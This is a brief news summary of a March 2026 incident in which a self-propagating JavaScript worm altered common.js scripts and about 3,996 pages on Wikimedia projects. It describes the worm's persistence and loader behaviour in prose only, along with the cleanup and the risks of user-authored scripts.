On March 5 2026 a Phabricator issue by the Wikimedia Foundation said engineers temporarily restricted editing after a self-propagating JavaScript worm modified about 3,996 pages and replaced roughly 85 users’ common.js scripts across wiki projects
KEY FACTS
- Incident Self-propagating JavaScript injected into global and user common.js files
- Scope About 3,996 pages modified and around 85 users had common.js replaced
- Origin Malicious test.js was hosted on Russian Wikipedia
- Response Editing was temporarily restricted and injected code was removed
The malicious file was stored at a user page on Russian Wikipedia and an archived test script shows the code attempted to overwrite User:<username>/common.js and MediaWiki:Common.js so the loader would run in editors’ browsers
The loader attempted site-level persistence by editing MediaWiki:Common.js when the executing account had privileges and it also modified individual users’ common.js files to automatically load the payload
The worm also edited random pages by using the Special:Random command to insert an image and a hidden JavaScript loader that fetched an external payload
BleepingComputer’s review counted about 3,996 modified pages and roughly 85 users with replaced common.js files. Engineers rolled back affected scripts, suppressed the modified pages in histories, and removed the injected code so editing is again possible
WHY IT MATTERS
Global and user JavaScript run in editors’ browsers so a malicious or dormant script can spread rapidly and alter content at scale. The incident highlights risks in executing user authored code and the need to limit and review such execution carefully